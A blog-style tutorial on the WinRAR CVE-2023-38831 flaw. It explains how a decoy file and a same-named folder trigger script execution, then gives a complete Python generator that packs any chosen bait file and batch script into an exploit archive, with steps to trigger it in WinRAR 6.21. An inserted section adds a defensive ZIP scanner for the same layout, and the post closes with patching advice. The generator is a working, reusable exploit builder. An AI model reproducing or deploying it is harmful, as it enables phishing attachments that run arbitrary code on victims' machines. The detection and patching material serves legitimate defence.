Decoding the 0day: A Guide to WinRAR’s CVE-2023-38831 Vulnerability

In the evolving digital landscape, cybersecurity has never been more critical.

With new vulnerabilities cropping up almost daily, staying informed and prepared is our best defence.

This blog post focuses on an emerging security threat that has taken the cybersecurity world by storm – CVE-2023-38831.

Identified recently, this vulnerability affects one of the most widely used file archiver utilities, WinRAR.

As we delve into the depths of what CVE-2023-38831 entails, we’ll also discuss how it can potentially impact millions of users worldwide and the steps you can take to safeguard your systems.

How Does the Vulnerability Work?

The WinRAR 0day vulnerability allows attackers to create malicious .RAR and .ZIP archives. These archives display seemingly harmless decoy files, such as JPG images, text files, or PDFs. Users trigger the vulnerability when they double-click one of these files in WinRAR’s window.

When the user opens the decoy document or image, WinRAR instead executes a .cmd or .bat script stored in a folder in the archive that carries the same name as the decoy. The script can install malware on the device or run arbitrary commands.

However, EDR agents on the host will usually intercept such malicious commands. For demonstration purposes, we’ll use a script that launches the calculator (start calc).

The CVE-2023-38831 vulnerability in WinRAR has been exploited in the wild to target individual users involved in trading.

This vulnerability affects WinRAR versions earlier than 6.23. This guide will walk you through the steps to reproduce it.
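As an added defensive example (not code from the original post), here is a Python scanner that inspects a ZIP archive’s entry names for the layout this vulnerability relies on: a path component ending in a space, a file and a folder sharing one name, and a script-type file inside that folder. The executable-extension list and the two constructed sample archives are assumptions of this example, not taken from WinRAR or from the post; the scanner is meant for mail-gateway or triage scripts that already have the attachment bytes in hand.

```python
import io
import posixpath
import zipfile

# Extensions that run code when WinRAR "opens" the entry it extracted.
# Assumption: a defender's default list, not something published by WinRAR.
EXECUTABLE_EXTS = {".cmd", ".bat", ".exe", ".com", ".vbs", ".js", ".ps1", ".lnk", ".scr"}


def _entry_names(data: bytes) -> list[str]:
    """Return every entry name stored in the archive's central directory."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [info.filename for info in zf.infolist()]


def scan_archive(data: bytes) -> list[str]:
    """Return human-readable findings; an empty list means no indicator matched."""
    names = _entry_names(data)
    files = sorted(n for n in names if not n.endswith("/"))

    # Collect every directory implied by the paths; explicit dir entries are optional in ZIP.
    dirs = set()
    for n in names:
        parts = n.rstrip("/").split("/")
        for k in range(1, len(parts)):
            dirs.add("/".join(parts[:k]))
        if n.endswith("/"):
            dirs.add(n.rstrip("/"))

    findings = []
    # Indicator 1: a path component ending in a space. Windows never creates such
    # names, and the decoy/folder pair in this CVE depends on exactly that.
    for n in names:
        for part in n.rstrip("/").split("/"):
            if part != part.rstrip(" "):
                findings.append(f"trailing space in path component {part!r} of entry {n!r}")
                break

    # Indicator 2: a file and a directory with the same name. Impossible on a real
    # filesystem, so an archive holding both was crafted deliberately.
    for f in files:
        if f in dirs:
            findings.append(f"file and directory share the name {f!r}")
            # Indicator 3: a script-type file inside that directory (the payload).
            for inner in files:
                if inner.startswith(f + "/"):
                    ext = posixpath.splitext(inner.rstrip(" "))[1].lower()
                    if ext in EXECUTABLE_EXTS:
                        findings.append(f"executable {inner!r} hidden under decoy folder {f!r}")
    return findings


def build_sample(malicious: bool) -> bytes:
    """Constructed fixtures: one archive with the CVE layout, one ordinary archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if malicious:
            decoy = "CLASSIFIED_DOCUMENTS.pdf "  # decoy name, note the trailing space
            zf.writestr(decoy, b"%PDF-1.4 placeholder")
            # Folder with the decoy's name, holding a script with the decoy's name plus .cmd.
            zf.writestr(f"{decoy}/{decoy}.cmd", b"rem constructed placeholder")
        else:
            zf.writestr("report.pdf", b"%PDF-1.4 placeholder")
            zf.writestr("notes/readme.txt", b"nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("malicious", build_sample(True)), ("benign", build_sample(False))):
        print(label, scan_archive(blob) or "clean")
```

The check works purely on the central-directory names, so it costs nothing to run on every inbound attachment; a trailing-space component alone is a strong enough signal to quarantine, while the file/directory name collision plus a script inside it is the exact shape produced by the generator shown later on this page.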

Constructing the Vulnerable Compression Package

Here’s a Python script to generate a vulnerable compression package:

import os
import shutil
import sys
from os.path import join

TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "CVE-2023-38831-poc.rar"

BAIT_NAME = "CLASSIFIED_DOCUMENTS.pdf"
SCRIPT_NAME = "script.bat"

if len(sys.argv) > 3:
    BAIT_NAME = os.path.basename(sys.argv[1])
    SCRIPT_NAME = os.path.basename(sys.argv[2])
    OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    pass  # use the defaults above
else:
    # Raw string so the backslashes in the Windows-style paths are not read as escapes.
    print(r"""Usage:
          python .\cve-2023-38831-exp-gen.py poc
          python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    sys.exit()

# Extension of the decoy as bytes (e.g. b".pdf"), used for the byte-level rename below.
BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")

print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)

# Build the staging tree. A filesystem cannot hold a file and a folder with the same
# name, so the folder gets an "A" suffix and the decoy a "B" suffix; both suffixes
# are patched to a trailing space inside the finished archive.
if os.path.exists(TEMPLATE_NAME):
    shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
os.mkdir(d)

# The script is stored inside the folder under the decoy's name plus ".cmd".
shutil.copyfile(SCRIPT_NAME, join(d, BAIT_NAME + "A.cmd"))
shutil.copyfile(BAIT_NAME, join(TEMPLATE_NAME, BAIT_NAME + "B"))

# if os.path.exists(OUTPUT_NAME):
#     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
#     sys.exit()

# The archive is ZIP-formatted even though the default output name ends in .rar;
# WinRAR identifies the format from the content, not the extension.
shutil.make_archive(TEMPLATE_NAME, "zip", TEMPLATE_NAME)

# Rewrite the stored names in place: ".pdfA" -> ".pdf " and ".pdfB" -> ".pdf ", so the
# decoy file and the folder end up with the identical name (trailing space included)
# and the script becomes "<decoy>.pdf .cmd".
with open(TEMPLATE_NAME + ".zip", "rb") as f:
    content = f.read()
    content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")

os.remove(TEMPLATE_NAME + ".zip")

with open(OUTPUT_NAME, "wb") as f:
    f.write(content)

print("ok..")

Now, create a decoy file in the current folder (for example a PDF, TXT, or PNG). Then create a script.bat file containing the command “start calc”.

Run the Python script to generate the archive (the script writes ZIP-formatted content under the .rar output name):

python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>

Verifying the Vulnerability

To verify the vulnerability, use WinRAR v6.21 on a Windows 10 environment. Open the compressed package in WinRAR and double-click the PDF file.

If the vulnerability is successfully exploited, the calculator app will launch. This vulnerability is commonly found in phishing email attachments.

Suggestions for Fixing the Vulnerability

To safeguard your system from the CVE-2023-38831 vulnerability in WinRAR, it’s vital to keep your software up-to-date.

Here are some steps to help ensure your protection:

  1. Immediate Software Update: As a primary step, make sure to update your WinRAR application to the latest version without delay. The developers of WinRAR continuously work on patching vulnerabilities and enhancing the software’s security. Therefore, keeping your software updated ensures that you benefit from these improvements and stay protected against known vulnerabilities.
  2. Regular Check for Updates: Often, users neglect or forget to check for updates, leaving their systems at risk. To prevent this, make it a routine to manually check for updates regularly. Alternatively, you can enable automatic updates if this feature is available. This way, your software will update itself whenever a new version is released.
  3. Download from Official Sources Only: Always download updates directly from the official WinRAR website or trusted sources. Third-party websites may provide compromised versions of the software, which could further expose your system to risks.
  4. Stay Informed: Keep yourself informed about the latest security threats and vulnerabilities related to the software you use. Following tech news or subscribing to security bulletins can help you stay aware of potential risks and understand when immediate action is needed.
  5. Use Antivirus Software: Regularly scan your system with reliable antivirus software. This can help detect and remove any malware that might exploit vulnerabilities in your system.
  6. Be Cautious with Unknown Files: Do not open files from unknown or untrusted sources. These could be attempts to exploit vulnerabilities like the CVE-2023-38831.

Remember, software updates are not just about adding new features; they also fix bugs and patch security vulnerabilities.

Hence, staying updated is one of the most effective ways to protect your system.

Conclusion

Confronting vulnerabilities like CVE-2023-38831 is a stark reminder of the constant vigilance required in today’s interconnected world.

Staying updated with the latest software versions, being cautious with files from unfamiliar sources, and employing robust antivirus software are a few of the many steps you can take to mitigate such risks.